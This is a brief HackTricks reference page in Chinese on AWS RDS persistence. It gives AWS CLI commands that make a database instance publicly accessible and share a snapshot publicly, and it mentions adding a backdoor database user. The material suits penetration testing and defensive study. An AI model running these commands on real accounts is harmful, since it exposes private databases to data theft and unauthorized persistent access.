AWS - RDS Persistence

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 分享黑客技巧。

RDS

有关更多信息，请查看：

具有此权限的攻击者可以修改现有的 RDS 实例以启用公共访问。

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

攻击者可以在数据库中创建一个用户，即使主用户的密码被修改，他也不会失去对数据库的访问。

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 上关注 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

Last updated 3 days ago